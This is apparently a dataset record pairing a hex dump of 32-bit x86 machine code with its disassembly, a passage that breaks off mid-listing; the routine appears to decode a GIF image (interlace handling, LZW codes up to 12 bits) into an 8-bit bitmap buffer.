83ec345355568bf133c933d28b86b40000008bae940000005783c509668b0883c002894e608986b4000000668b1083c00233c989565c8986b4000000668b088bd183c0024a894e5483ca038986b400000083c0028d4a0133d2894e6c668b50fe8956588986b40000008a10408986b40000008b46580fafc189869800000005286400005088563d89ae94000000e8f37505008b96980000008bf883c404897c24248d47288d8800040000898eac00000003ca894c243083c102ba0010000033db6689590266891983c1064a75f3c707280000008b4e54894f048b5658f7dab90001000089570866c7470c010066c7470e0800895f10895f14895f18895f1c894f20894f248a4e3df6c1800f84a000000083e107bf0100000041d3e7399e88000000742a8b8e8c0000008b96b40000008d0c498d2c1133c933d28a6d028a55008a4d01c1e1080bca898ea00000008b96940000008d0c7f03d13bfb8996940000000f86ad0000008b96b400000083c0048a0a8848fe8b96b4000000428bca8996b40000008a118850fd8b8eb400000041898eb40000008a098848fc8baeb4000000454f89aeb4000000c640ff0075b8eb638b8e880000008bbea80000003bcb74238bae8c00000033c98d146f03ea33d28a6d028a55008a4d01c1e1080bca898ea00000008b968000000033c93bd37e248a174788500283c0048a17478850fd8a17c640ff008850fc8b968000000047413bca7cdc8b86b400000033c9ba010000008a08408986b40000008b869400000040894e408986940000008bc2d3e0894e44895e48c6463c00895e5089564c895e7c83c002895e7889442418894424144841894424408b464040894e44894640895664895e688b46488b4e403bc172318a563cb301d2e38bca81e1ff000000fecb81e3ff00000023d98a4e40d2ea8b4e408beb896c24382bc188563ce9b30100008b7e508b4e4c33d23bcf8a563c8bea72658b8eb400000033d28b9e940000008a11c7464c000000008956508b7e508d51018d4f018996b400000003d9899e940000008bcb3b4e747e122bcf4980caff898e9400000088542428eb3585ff75174a498996b400000080caff898e9400000088542428eb1a8b4e4c41894e4c8b8eb40000008a114188542428898eb40000008b4e4088563c2bc883f90877448a4e408a5e482acbb301d2e3884c24138b4c242881e1ff000000fecb81e3ff00000023d98bc8d3e38a4c2413d2ea03eb896c243888563c8b56402bc283c008e9d20000008b5424288bc881e2ff000000d3e28b4e4c03ea3bcf725e8b8eb40000008b9e9400000033d28a118d790189565089beb40000008d4a01c7464c0000000003d9899e940000008bcb3b4e747e102bcac644242cff49898e94000000eb3385d275154f4989beb4000000898e94000000c644242cffeb1a8b4e4c41894e4c8b8eb40000008a11418854242c898eb40000008a56408a4e482ad1b30180ea088acad2e38b4c242c81e1ff000000fecb81e3ff00000023d98d4808d3e38aca8a54242cd2ea03eb896c243888563c8b56402bc283c0108bcd8946488b44244081e1ffff00003bc80f8461070000483bc80f85430200008b4e448b46488b5424143bc1894e408954241872288a563cb301d2e38bfa81e7ff000000d2eafecb81e3ff00000023df2bc188563c894648e9380100008b4e4c8b565033db3bca8a5e3c72608bbeb40000008bae9400000033d28a174789565089beb40000008d4a01c7464c0000000003e989ae940000008bcd3b4e747e122bca49898e9400000080c9ff884c241ceb3685d275174f49898e9400000080c9ff89beb4000000884c241ceb1b8b4e4c8b96b40000004142894e4c8a4aff884c241c8996b40000008b5640884e3c2bd083fa0877448a4e408a56482acab201d2e2884c24138b4c241c81e1ff000000feca81e2ff00000023d18bc8d3e28a4c241303da8a54241cd2ea88563c8b56402bc283c008894648eb5d8b54241c8bc881e2ff000000d3e28bce03dae85f1703008a56408a4e482ad18844243c80ea08b0018aca8b7e48d2e08b4c243c81e1ff000000fec825ff00000023c18d4f08d3e08aca03d88a44243cd2e82b7e4083c71088463c897e488b4424148bd381e2ffff0000895c24203bd00f8f86050000f6463d40746c8b46788b4e543bc175488b4664c746780000000083f80175048346680883f80275048346680883f80375048346680483f8047504834668028b4e688b56583bca7c108d4801ba10000000d3fa894e648956688b466c8b56780faf46688b8eac00000003c2881c018b4e78eb248b56788b46543bd0750e8b467cc74678000000004089467c8b467c8b4e780faf466c03c141894e788b8e980000003bc10f8fbdfbffff8b8eac000000881c01e9affbffff3b4c24180f8d070200008b54241433c08bdd8b6c24303bca7c328bcb81e1ffff00008d14498d4c5500668941048bc3668b5902663bd80f83ab0400008b5424148bcb81e1ffff00003bca7dcef6463d40746a8b56788b4e543bd175468b4e64c746780000000083f90175048346680883f90275048346680883f90375048346680483f9047504834668028b56688b7e583bd77c0e41ba10000000d3fa894e648956688b4e6c8b7e780faf4e688b96ac00000003cf881c0a8b5678eb248b4e788b56543bca750e8b4e7cc746780000000041894e7c8b4e7c8b56780faf4e6c03ca428956788b96980000003bca7f098b96ac000000881c0a6685c00f84c800000025ffff00008d04408a5445008d7c4500f6463d40746a8b4e788b46543bc875468b4664c746780000000083f80175048346680883f80275048346680883f80375048346680483f8047504834668028b4e683b4e587c108d4801b810000000d3f8894e648946688b466c8b4e780faf466803c18b8eac0000008814018b4e78eb248b46788b4e543bc1750e8b467cc74678000000004089467c8b467c8b4e780faf466c03c141894e788b8e980000003bc17f098b8eac000000881401668b47046685c00f8538ffffff8b542418668b4c24208d045242895424188d4445008818668948028b4e40b801000000d3e03bd0750441894e408b4e40b80c0000003bc876038946408b4c2438894c2420e99ef9ffff8b4c24208b5424148b6c24308bd981e1ffff000033c03bca895c24347c2c8d0c498d4c4d0066894104668b49028bc3894c2434663bc80f83b10200008b5c243481e1ffff00003bca7dd4f6463d4074768b56788b4e543bd175498b4e64c746780000000083f901bf080000007503017e6883f9027503017e6883f90375048346680483f9047504834668028b56683b56587c1541ba10000000d3fa894e64895668eb05bf080000008b4e6c8b56780faf4e6803ca8b96ac000000881c0a8b567842895678eb2d8b4e788b56543bca750e8b4e7cc746780000000041894e7c8b4e7c8b56780faf4e6c03ca42895678bf080000003b8e980000007f098b96ac000000881c0a6685c00f84bf00000033c925ffff00008d04408a5c45008d544500f6463d408b4678745f3b465475408b4664894e7883f8017503017e6883f8027503017e6883f80375048346680483f8047504834668028b4e683b4e587c108d4801b810000000d3f8894e648946688b466c8b4e780faf466803c18b8eac000000881c018b4e78eb1b3b4654750a8b467c894e784089467c8b467c8b4e780faf466c03c141894e788b8e980000003bc17f098b8eac000000881c01668b420433c9663bc10f8547ffffff8b5c24348a463d8b5678a8408b465474643bd075468b4664c746780000000083f8017503017e6883f8027503017e6883f80375048346680483f8047504834668028b4e688b56583bca7c108d4801ba10000000d3fa894e648956688b466c8b56780faf46688b8eac00000003c2881c018b4e78eb1e3bd0750e8b467cc74678000000004089467c8b467c8b4e780faf466c03c141894e788b8e980000003bc17f098b8eac000000881c018b542418668b4c24208d045242895424188d4445008818668948028b4e40b801000000d3e03bd0750441894e408b4e40b80c0000003bc80f8644fdffff8b4c2438894640894c2420e9dff6ffff8b54242452e80f6b050083c40433c05f5e5d5b83c434c38b44242450e8f86a050083c40433c05f5e5d5b83c434c38b4c242451e8e16a050083c40433c05f5e5d5b83c434c383bee80000000175278b86980000008b542424052864000033ff8986f00000008bc78996ec0000005f5e5d5b83c434c38b5c24248b8eac0000008b96a40000006a0053516a045352ff1520f14b008baeb40000008b96940000004542538bf889aeb4000000899694000000e8646a050083c4048bc75f5e5d5b83c434c3
|
[
"sub esp, 0x34",
"push ebx",
"push ebp",
"push esi",
"mov esi, ecx",
"xor ecx, ecx",
"xor edx, edx",
"mov eax, dword [esi + 0xb4]",
"mov ebp, dword [esi + 0x94]",
"push edi",
"add ebp, 9",
"mov cx, word [eax]",
"add eax, 2",
"mov dword [esi + 0x60], ecx",
"mov dword [esi + 0xb4], eax",
"mov dx, word [eax]",
"add eax, 2",
"xor ecx, ecx",
"mov dword [esi + 0x5c], edx",
"mov dword [esi + 0xb4], eax",
"mov cx, word [eax]",
"mov edx, ecx",
"add eax, 2",
"dec edx",
"mov dword [esi + 0x54], ecx",
"or edx, 3",
"mov dword [esi + 0xb4], eax",
"add eax, 2",
"lea ecx, [edx + 1]",
"xor edx, edx",
"mov dword [esi + 0x6c], ecx",
"mov dx, word [eax - 2]",
"mov dword [esi + 0x58], edx",
"mov dword [esi + 0xb4], eax",
"mov dl, byte [eax]",
"inc eax",
"mov dword [esi + 0xb4], eax",
"mov eax, dword [esi + 0x58]",
"imul eax, ecx",
"mov dword [esi + 0x98], eax",
"add eax, 0x6428",
"push eax",
"mov byte [esi + 0x3d], dl",
"mov dword [esi + 0x94], ebp",
"call fcn.004ac835",
"mov edx, dword [esi + 0x98]",
"mov edi, eax",
"add esp, 4",
"mov dword [esp + 0x24], edi",
"lea eax, [edi + 0x28]",
"lea ecx, [eax + 0x400]",
"mov dword [esi + 0xac], ecx",
"add ecx, edx",
"mov dword [esp + 0x30], ecx",
"add ecx, 2",
"mov edx, 0x1000",
"xor ebx, ebx",
"mov word [ecx + 2], bx",
"mov word [ecx], bx",
"add ecx, 6",
"dec edx",
"jne 0x455270",
"mov dword [edi], 0x28",
"mov ecx, dword [esi + 0x54]",
"mov dword [edi + 4], ecx",
"mov edx, dword [esi + 0x58]",
"neg edx",
"mov ecx, 0x100",
"mov dword [edi + 8], edx",
"mov word [edi + 0xc], 1",
"mov word [edi + 0xe], 8",
"mov dword [edi + 0x10], ebx",
"mov dword [edi + 0x14], ebx",
"mov dword [edi + 0x18], ebx",
"mov dword [edi + 0x1c], ebx",
"mov dword [edi + 0x20], ecx",
"mov dword [edi + 0x24], ecx",
"mov cl, byte [esi + 0x3d]",
"test cl, 0x80",
"je 0x455360",
"and ecx, 7",
"mov edi, 1",
"inc ecx",
"shl edi, cl",
"cmp dword [esi + 0x88], ebx",
"je 0x4552fd",
"mov ecx, dword [esi + 0x8c]",
"mov edx, dword [esi + 0xb4]",
"lea ecx, [ecx + ecx*2]",
"lea ebp, [ecx + edx]",
"xor ecx, ecx",
"xor edx, edx",
"mov ch, byte [ebp + 2]",
"mov dl, byte [ebp]",
"mov cl, byte [ebp + 1]",
"shl ecx, 8",
"or ecx, edx",
"mov dword [esi + 0xa0], ecx",
"mov edx, dword [esi + 0x94]",
"lea ecx, [edi + edi*2]",
"add edx, ecx",
"cmp edi, ebx",
"mov dword [esi + 0x94], edx",
"jbe 0x4553c3",
"mov edx, dword [esi + 0xb4]",
"add eax, 4",
"mov cl, byte [edx]",
"mov byte [eax - 2], cl",
"mov edx, dword [esi + 0xb4]",
"inc edx",
"mov ecx, edx",
"mov dword [esi + 0xb4], edx",
"mov dl, byte [ecx]",
"mov byte [eax - 3], dl",
"mov ecx, dword [esi + 0xb4]",
"inc ecx",
"mov dword [esi + 0xb4], ecx",
"mov cl, byte [ecx]",
"mov byte [eax - 4], cl",
"mov ebp, dword [esi + 0xb4]",
"inc ebp",
"dec edi",
"mov dword [esi + 0xb4], ebp",
"mov byte [eax - 1], 0",
"jne 0x455316",
"jmp 0x4553c3",
"mov ecx, dword [esi + 0x88]",
"mov edi, dword [esi + 0xa8]",
"cmp ecx, ebx",
"je 0x455393",
"mov ebp, dword [esi + 0x8c]",
"xor ecx, ecx",
"lea edx, [edi + ebp*2]",
"add ebp, edx",
"xor edx, edx",
"mov ch, byte [ebp + 2]",
"mov dl, byte [ebp]",
"mov cl, byte [ebp + 1]",
"shl ecx, 8",
"or ecx, edx",
"mov dword [esi + 0xa0], ecx",
"mov edx, dword [esi + 0x80]",
"xor ecx, ecx",
"cmp edx, ebx",
"jle 0x4553c3",
"mov dl, byte [edi]",
"inc edi",
"mov byte [eax + 2], dl",
"add eax, 4",
"mov dl, byte [edi]",
"inc edi",
"mov byte [eax - 3], dl",
"mov dl, byte [edi]",
"mov byte [eax - 1], 0",
"mov byte [eax - 4], dl",
"mov edx, dword [esi + 0x80]",
"inc edi",
"inc ecx",
"cmp ecx, edx",
"jl 0x45539f",
"mov eax, dword [esi + 0xb4]",
"xor ecx, ecx",
"mov edx, 1",
"mov cl, byte [eax]",
"inc eax",
"mov dword [esi + 0xb4], eax",
"mov eax, dword [esi + 0x94]",
"inc eax",
"mov dword [esi + 0x40], ecx",
"mov dword [esi + 0x94], eax",
"mov eax, edx",
"shl eax, cl",
"mov dword [esi + 0x44], ecx",
"mov dword [esi + 0x48], ebx",
"mov byte [esi + 0x3c], 0",
"mov dword [esi + 0x50], ebx",
"mov dword [esi + 0x4c], edx",
"mov dword [esi + 0x7c], ebx",
"add eax, 2",
"mov dword [esi + 0x78], ebx",
"mov dword [esp + 0x18], eax",
"mov dword [esp + 0x14], eax",
"dec eax",
"inc ecx",
"mov dword [esp + 0x40], eax",
"mov eax, dword [esi + 0x40]",
"inc eax",
"mov dword [esi + 0x44], ecx",
"mov dword [esi + 0x40], eax",
"mov dword [esi + 0x64], edx",
"mov dword [esi + 0x68], ebx",
"mov eax, dword [esi + 0x48]",
"mov ecx, dword [esi + 0x40]",
"cmp eax, ecx",
"jb 0x45545f",
"mov dl, byte [esi + 0x3c]",
"mov bl, 1",
"shl bl, cl",
"mov ecx, edx",
"and ecx, 0xff",
"dec bl",
"and ebx, 0xff",
"and ebx, ecx",
"mov cl, byte [esi + 0x40]",
"shr dl, cl",
"mov ecx, dword [esi + 0x40]",
"mov ebp, ebx",
"mov dword [esp + 0x38], ebp",
"sub eax, ecx",
"mov byte [esi + 0x3c], dl",
"jmp 0x455612",
"mov edi, dword [esi + 0x50]",
"mov ecx, dword [esi + 0x4c]",
"xor edx, edx",
"cmp ecx, edi",
"mov dl, byte [esi + 0x3c]",
"mov ebp, edx",
"jb 0x4554d5",
"mov ecx, dword [esi + 0xb4]",
"xor edx, edx",
"mov ebx, dword [esi + 0x94]",
"mov dl, byte [ecx]",
"mov dword [esi + 0x4c], 0",
"mov dword [esi + 0x50], edx",
"mov edi, dword [esi + 0x50]",
"lea edx, [ecx + 1]",
"lea ecx, [edi + 1]",
"mov dword [esi + 0xb4], edx",
"add ebx, ecx",
"mov dword [esi + 0x94], ebx",
"mov ecx, ebx",
"cmp ecx, dword [esi + 0x74]",
"jle 0x4554ba",
"sub ecx, edi",
"dec ecx",
"or dl, 0xff",
"mov dword [esi + 0x94], ecx",
"mov byte [esp + 0x28], dl",
"jmp 0x4554ef",
"test edi, edi",
"jne 0x4554d5",
"dec edx",
"dec ecx",
"mov dword [esi + 0xb4], edx",
"or dl, 0xff",
"mov dword [esi + 0x94], ecx",
"mov byte [esp + 0x28], dl",
"jmp 0x4554ef",
"mov ecx, dword [esi + 0x4c]",
"inc ecx",
"mov dword [esi + 0x4c], ecx",
"mov ecx, dword [esi + 0xb4]",
"mov dl, byte [ecx]",
"inc ecx",
"mov byte [esp + 0x28], dl",
"mov dword [esi + 0xb4], ecx",
"mov ecx, dword [esi + 0x40]",
"mov byte [esi + 0x3c], dl",
"sub ecx, eax",
"cmp ecx, 8",
"ja 0x455540",
"mov cl, byte [esi + 0x40]",
"mov bl, byte [esi + 0x48]",
"sub cl, bl",
"mov bl, 1",
"shl bl, cl",
"mov byte [esp + 0x13], cl",
"mov ecx, dword [esp + 0x28]",
"and ecx, 0xff",
"dec bl",
"and ebx, 0xff",
"and ebx, ecx",
"mov ecx, eax",
"shl ebx, cl",
"mov cl, byte [esp + 0x13]",
"shr dl, cl",
"add ebp, ebx",
"mov dword [esp + 0x38], ebp",
"mov byte [esi + 0x3c], dl",
"mov edx, dword [esi + 0x40]",
"sub eax, edx",
"add eax, 8",
"jmp 0x455612",
"mov edx, dword [esp + 0x28]",
"mov ecx, eax",
"and edx, 0xff",
"shl edx, cl",
"mov ecx, dword [esi + 0x4c]",
"add ebp, edx",
"cmp ecx, edi",
"jb 0x4555b5",
"mov ecx, dword [esi + 0xb4]",
"mov ebx, dword [esi + 0x94]",
"xor edx, edx",
"mov dl, byte [ecx]",
"lea edi, [ecx + 1]",
"mov dword [esi + 0x50], edx",
"mov dword [esi + 0xb4], edi",
"lea ecx, [edx + 1]",
"mov dword [esi + 0x4c], 0",
"add ebx, ecx",
"mov dword [esi + 0x94], ebx",
"mov ecx, ebx",
"cmp ecx, dword [esi + 0x74]",
"jle 0x45559c",
"sub ecx, edx",
"mov byte [esp + 0x2c], 0xff",
"dec ecx",
"mov dword [esi + 0x94], ecx",
"jmp 0x4555cf",
"test edx, edx",
"jne 0x4555b5",
"dec edi",
"dec ecx",
"mov dword [esi + 0xb4], edi",
"mov dword [esi + 0x94], ecx",
"mov byte [esp + 0x2c], 0xff",
"jmp 0x4555cf",
"mov ecx, dword [esi + 0x4c]",
"inc ecx",
"mov dword [esi + 0x4c], ecx",
"mov ecx, dword [esi + 0xb4]",
"mov dl, byte [ecx]",
"inc ecx",
"mov byte [esp + 0x2c], dl",
"mov dword [esi + 0xb4], ecx",
"mov dl, byte [esi + 0x40]",
"mov cl, byte [esi + 0x48]",
"sub dl, cl",
"mov bl, 1",
"sub dl, 8",
"mov cl, dl",
"shl bl, cl",
"mov ecx, dword [esp + 0x2c]",
"and ecx, 0xff",
"dec bl",
"and ebx, 0xff",
"and ebx, ecx",
"lea ecx, [eax + 8]",
"shl ebx, cl",
"mov cl, dl",
"mov dl, byte [esp + 0x2c]",
"shr dl, cl",
"add ebp, ebx",
"mov dword [esp + 0x38], ebp",
"mov byte [esi + 0x3c], dl",
"mov edx, dword [esi + 0x40]",
"sub eax, edx",
"add eax, 0x10",
"mov ecx, ebp",
"mov dword [esi + 0x48], eax",
"mov eax, dword [esp + 0x40]",
"and ecx, 0xffff",
"cmp ecx, eax",
"je 0x455d8a",
"dec eax",
"cmp ecx, eax",
"jne 0x455875",
"mov ecx, dword [esi + 0x44]",
"mov eax, dword [esi + 0x48]",
"mov edx, dword [esp + 0x14]",
"cmp eax, ecx",
"mov dword [esi + 0x40], ecx",
"mov dword [esp + 0x18], edx",
"jb 0x45566f",
"mov dl, byte [esi + 0x3c]",
"mov bl, 1",
"shl bl, cl",
"mov edi, edx",
"and edi, 0xff",
"shr dl, cl",
"dec bl",
"and ebx, 0xff",
"and ebx, edi",
"sub eax, ecx",
"mov byte [esi + 0x3c], dl",
"mov dword [esi + 0x48], eax",
"jmp 0x4557a7",
"mov ecx, dword [esi + 0x4c]",
"mov edx, dword [esi + 0x50]",
"xor ebx, ebx",
"cmp ecx, edx",
"mov bl, byte [esi + 0x3c]",
"jb 0x4556de",
"mov edi, dword [esi + 0xb4]",
"mov ebp, dword [esi + 0x94]",
"xor edx, edx",
"mov dl, byte [edi]",
"inc edi",
"mov dword [esi + 0x50], edx",
"mov dword [esi + 0xb4], edi",
"lea ecx, [edx + 1]",
"mov dword [esi + 0x4c], 0",
"add ebp, ecx",
"mov dword [esi + 0x94], ebp",
"mov ecx, ebp",
"cmp ecx, dword [esi + 0x74]",
"jle 0x4556c3",
"sub ecx, edx",
"dec ecx",
"mov dword [esi + 0x94], ecx",
"or cl, 0xff",
"mov byte [esp + 0x1c], cl",
"jmp 0x4556f9",
"test edx, edx",
"jne 0x4556de",
"dec edi",
"dec ecx",
"mov dword [esi + 0x94], ecx",
"or cl, 0xff",
"mov dword [esi + 0xb4], edi",
"mov byte [esp + 0x1c], cl",
"jmp 0x4556f9",
"mov ecx, dword [esi + 0x4c]",
"mov edx, dword [esi + 0xb4]",
"inc ecx",
"inc edx",
"mov dword [esi + 0x4c], ecx",
"mov cl, byte [edx - 1]",
"mov byte [esp + 0x1c], cl",
"mov dword [esi + 0xb4], edx",
"mov edx, dword [esi + 0x40]",
"mov byte [esi + 0x3c], cl",
"sub edx, eax",
"cmp edx, 8",
"ja 0x45574a",
"mov cl, byte [esi + 0x40]",
"mov dl, byte [esi + 0x48]",
"sub cl, dl",
"mov dl, 1",
"shl dl, cl",
"mov byte [esp + 0x13], cl",
"mov ecx, dword [esp + 0x1c]",
"and ecx, 0xff",
"dec dl",
"and edx, 0xff",
"and edx, ecx",
"mov ecx, eax",
"shl edx, cl",
"mov cl, byte [esp + 0x13]",
"add ebx, edx",
"mov dl, byte [esp + 0x1c]",
"shr dl, cl",
"mov byte [esi + 0x3c], dl",
"mov edx, dword [esi + 0x40]",
"sub eax, edx",
"add eax, 8",
"mov dword [esi + 0x48], eax",
"jmp 0x4557a7",
"mov edx, dword [esp + 0x1c]",
"mov ecx, eax",
"and edx, 0xff",
"shl edx, cl",
"mov ecx, esi",
"add ebx, edx",
"call fcn.00486ec0",
"mov dl, byte [esi + 0x40]",
"mov cl, byte [esi + 0x48]",
"sub dl, cl",
"mov byte [esp + 0x3c], al",
"sub dl, 8",
"mov al, 1",
"mov cl, dl",
"mov edi, dword [esi + 0x48]",
"shl al, cl",
"mov ecx, dword [esp + 0x3c]",
"and ecx, 0xff",
"dec al",
"and eax, 0xff",
"and eax, ecx",
"lea ecx, [edi + 8]",
"shl eax, cl",
"mov cl, dl",
"add ebx, eax",
"mov al, byte [esp + 0x3c]",
"shr al, cl",
"sub edi, dword [esi + 0x40]",
"add edi, 0x10",
"mov byte [esi + 0x3c], al",
"mov dword [esi + 0x48], edi",
"mov eax, dword [esp + 0x14]",
"mov edx, ebx",
"and edx, 0xffff",
"mov dword [esp + 0x20], ebx",
"cmp edx, eax",
"jg 0x455d45",
"test byte [esi + 0x3d], 0x40",
"je 0x455831",
"mov eax, dword [esi + 0x78]",
"mov ecx, dword [esi + 0x54]",
"cmp eax, ecx",
"jne 0x455817",
"mov eax, dword [esi + 0x64]",
"mov dword [esi + 0x78], 0",
"cmp eax, 1",
"jne 0x4557e2",
"add dword [esi + 0x68], 8",
"cmp eax, 2",
"jne 0x4557eb",
"add dword [esi + 0x68], 8",
"cmp eax, 3",
"jne 0x4557f4",
"add dword [esi + 0x68], 4",
"cmp eax, 4",
"jne 0x4557fd",
"add dword [esi + 0x68], 2",
"mov ecx, dword [esi + 0x68]",
"mov edx, dword [esi + 0x58]",
"cmp ecx, edx",
"jl 0x455817",
"lea ecx, [eax + 1]",
"mov edx, 0x10",
"sar edx, cl",
"mov dword [esi + 0x64], ecx",
"mov dword [esi + 0x68], edx",
"mov eax, dword [esi + 0x6c]",
"mov edx, dword [esi + 0x78]",
"imul eax, dword [esi + 0x68]",
"mov ecx, dword [esi + 0xac]",
"add eax, edx",
"mov byte [ecx + eax], bl",
"mov ecx, dword [esi + 0x78]",
"jmp 0x455855",
"mov edx, dword [esi + 0x78]",
"mov eax, dword [esi + 0x54]",
"cmp edx, eax",
"jne 0x455849",
"mov eax, dword [esi + 0x7c]",
"mov dword [esi + 0x78], 0",
"inc eax",
"mov dword [esi + 0x7c], eax",
"mov eax, dword [esi + 0x7c]",
"mov ecx, dword [esi + 0x78]",
"imul eax, dword [esi + 0x6c]",
"add eax, ecx",
"inc ecx",
"mov dword [esi + 0x78], ecx",
"mov ecx, dword [esi + 0x98]",
"cmp eax, ecx",
"jg 0x455424",
"mov ecx, dword [esi + 0xac]",
"mov byte [ecx + eax], bl",
"jmp 0x455424",
"cmp ecx, dword [esp + 0x18]",
"jge 0x455a86",
"mov edx, dword [esp + 0x14]",
"xor eax, eax",
"mov ebx, ebp",
"mov ebp, dword [esp + 0x30]",
"cmp ecx, edx",
"jl 0x4558c1",
"mov ecx, ebx",
"and ecx, 0xffff",
"lea edx, [ecx + ecx*2]",
"lea ecx, [ebp + edx*2]",
"mov word [ecx + 4], ax",
"mov eax, ebx",
"mov bx, word [ecx + 2]",
"cmp bx, ax",
"jae 0x455d5c",
"mov edx, dword [esp + 0x14]",
"mov ecx, ebx",
"and ecx, 0xffff",
"cmp ecx, edx",
"jge 0x45588f",
"test byte [esi + 0x3d], 0x40",
"je 0x455931",
"mov edx, dword [esi + 0x78]",
"mov ecx, dword [esi + 0x54]",
"cmp edx, ecx",
"jne 0x455917",
"mov ecx, dword [esi + 0x64]",
"mov dword [esi + 0x78], 0",
"cmp ecx, 1",
"jne 0x4558e4",
"add dword [esi + 0x68], 8",
"cmp ecx, 2",
"jne 0x4558ed",
"add dword [esi + 0x68], 8",
"cmp ecx, 3",
"jne 0x4558f6",
"add dword [esi + 0x68], 4",
"cmp ecx, 4",
"jne 0x4558ff",
"add dword [esi + 0x68], 2",
"mov edx, dword [esi + 0x68]",
"mov edi, dword [esi + 0x58]",
"cmp edx, edi",
"jl 0x455917",
"inc ecx",
"mov edx, 0x10",
"sar edx, cl",
"mov dword [esi + 0x64], ecx",
"mov dword [esi + 0x68], edx",
"mov ecx, dword [esi + 0x6c]",
"mov edi, dword [esi + 0x78]",
"imul ecx, dword [esi + 0x68]",
"mov edx, dword [esi + 0xac]",
"add ecx, edi",
"mov byte [edx + ecx], bl",
"mov edx, dword [esi + 0x78]",
"jmp 0x455955",
"mov ecx, dword [esi + 0x78]",
"mov edx, dword [esi + 0x54]",
"cmp ecx, edx",
"jne 0x455949",
"mov ecx, dword [esi + 0x7c]",
"mov dword [esi + 0x78], 0",
"inc ecx",
"mov dword [esi + 0x7c], ecx",
"mov ecx, dword [esi + 0x7c]",
"mov edx, dword [esi + 0x78]",
"imul ecx, dword [esi + 0x6c]",
"add ecx, edx",
"inc edx",
"mov dword [esi + 0x78], edx",
"mov edx, dword [esi + 0x98]",
"cmp ecx, edx",
"jg 0x45596c",
"mov edx, dword [esi + 0xac]",
"mov byte [edx + ecx], bl",
"test ax, ax",
"je 0x455a3d",
"and eax, 0xffff",
"lea eax, [eax + eax*2]",
"mov dl, byte [ebp + eax*2]",
"lea edi, [ebp + eax*2]",
"test byte [esi + 0x3d], 0x40",
"je 0x4559f5",
"mov ecx, dword [esi + 0x78]",
"mov eax, dword [esi + 0x54]",
"cmp ecx, eax",
"jne 0x4559db",
"mov eax, dword [esi + 0x64]",
"mov dword [esi + 0x78], 0",
"cmp eax, 1",
"jne 0x4559a8",
"add dword [esi + 0x68], 8",
"cmp eax, 2",
"jne 0x4559b1",
"add dword [esi + 0x68], 8",
"cmp eax, 3",
"jne 0x4559ba",
"add dword [esi + 0x68], 4",
"cmp eax, 4",
"jne 0x4559c3",
"add dword [esi + 0x68], 2",
"mov ecx, dword [esi + 0x68]",
"cmp ecx, dword [esi + 0x58]",
"jl 0x4559db",
"lea ecx, [eax + 1]",
"mov eax, 0x10",
"sar eax, cl",
"mov dword [esi + 0x64], ecx",
"mov dword [esi + 0x68], eax",
"mov eax, dword [esi + 0x6c]",
"mov ecx, dword [esi + 0x78]",
"imul eax, dword [esi + 0x68]",
"add eax, ecx",
"mov ecx, dword [esi + 0xac]",
"mov byte [ecx + eax], dl",
"mov ecx, dword [esi + 0x78]",
"jmp 0x455a19",
"mov eax, dword [esi + 0x78]",
"mov ecx, dword [esi + 0x54]",
"cmp eax, ecx",
"jne 0x455a0d",
"mov eax, dword [esi + 0x7c]",
"mov dword [esi + 0x78], 0",
"inc eax",
"mov dword [esi + 0x7c], eax",
"mov eax, dword [esi + 0x7c]",
"mov ecx, dword [esi + 0x78]",
"imul eax, dword [esi + 0x6c]",
"add eax, ecx",
"inc ecx",
"mov dword [esi + 0x78], ecx",
"mov ecx, dword [esi + 0x98]",
"cmp eax, ecx",
"jg 0x455a30",
"mov ecx, dword [esi + 0xac]",
"mov byte [ecx + eax], dl",
"mov ax, word [edi + 4]",
"test ax, ax",
"jne 0x455975",
"mov edx, dword [esp + 0x18]",
"mov cx, word [esp + 0x20]",
"lea eax, [edx + edx*2]",
"inc edx",
"mov dword [esp + 0x18], edx",
"lea eax, [ebp + eax*2]",
"mov byte [eax], bl",
"mov word [eax + 2], cx",
"mov ecx, dword [esi + 0x40]",
"mov eax, 1",
"shl eax, cl",
"cmp edx, eax",
"jne 0x455a6a",
"inc ecx",
"mov dword [esi + 0x40], ecx",
"mov ecx, dword [esi + 0x40]",
"mov eax, 0xc",
"cmp ecx, eax",
"jbe 0x455a79",
"mov dword [esi + 0x40], eax",
"mov ecx, dword [esp + 0x38]",
"mov dword [esp + 0x20], ecx",
"jmp 0x455424",
"mov ecx, dword [esp + 0x20]",
"mov edx, dword [esp + 0x14]",
"mov ebp, dword [esp + 0x30]",
"mov ebx, ecx",
"and ecx, 0xffff",
"xor eax, eax",
"cmp ecx, edx",
"mov dword [esp + 0x34], ebx",
"jl 0x455ad0",
"lea ecx, [ecx + ecx*2]",
"lea ecx, [ebp + ecx*2]",
"mov word [ecx + 4], ax",
"mov cx, word [ecx + 2]",
"mov eax, ebx",
"mov dword [esp + 0x34], ecx",
"cmp cx, ax",
"jae 0x455d73",
"mov ebx, dword [esp + 0x34]",
"and ecx, 0xffff",
"cmp ecx, edx",
"jge 0x455aa4",
"test byte [esi + 0x3d], 0x40",
"je 0x455b4c",
"mov edx, dword [esi + 0x78]",
"mov ecx, dword [esi + 0x54]",
"cmp edx, ecx",
"jne 0x455b29",
"mov ecx, dword [esi + 0x64]",
"mov dword [esi + 0x78], 0",
"cmp ecx, 1",
"mov edi, 8",
"jne 0x455af7",
"add dword [esi + 0x68], edi",
"cmp ecx, 2",
"jne 0x455aff",
"add dword [esi + 0x68], edi",
"cmp ecx, 3",
"jne 0x455b08",
"add dword [esi + 0x68], 4",
"cmp ecx, 4",
"jne 0x455b11",
"add dword [esi + 0x68], 2",
"mov edx, dword [esi + 0x68]",
"cmp edx, dword [esi + 0x58]",
"jl 0x455b2e",
"inc ecx",
"mov edx, 0x10",
"sar edx, cl",
"mov dword [esi + 0x64], ecx",
"mov dword [esi + 0x68], edx",
"jmp 0x455b2e",
"mov edi, 8",
"mov ecx, dword [esi + 0x6c]",
"mov edx, dword [esi + 0x78]",
"imul ecx, dword [esi + 0x68]",
"add ecx, edx",
"mov edx, dword [esi + 0xac]",
"mov byte [edx + ecx], bl",
"mov edx, dword [esi + 0x78]",
"inc edx",
"mov dword [esi + 0x78], edx",
"jmp 0x455b79",
"mov ecx, dword [esi + 0x78]",
"mov edx, dword [esi + 0x54]",
"cmp ecx, edx",
"jne 0x455b64",
"mov ecx, dword [esi + 0x7c]",
"mov dword [esi + 0x78], 0",
"inc ecx",
"mov dword [esi + 0x7c], ecx",
"mov ecx, dword [esi + 0x7c]",
"mov edx, dword [esi + 0x78]",
"imul ecx, dword [esi + 0x6c]",
"add ecx, edx",
"inc edx",
"mov dword [esi + 0x78], edx",
"mov edi, 8",
"cmp ecx, dword [esi + 0x98]",
"jg 0x455b8a",
"mov edx, dword [esi + 0xac]",
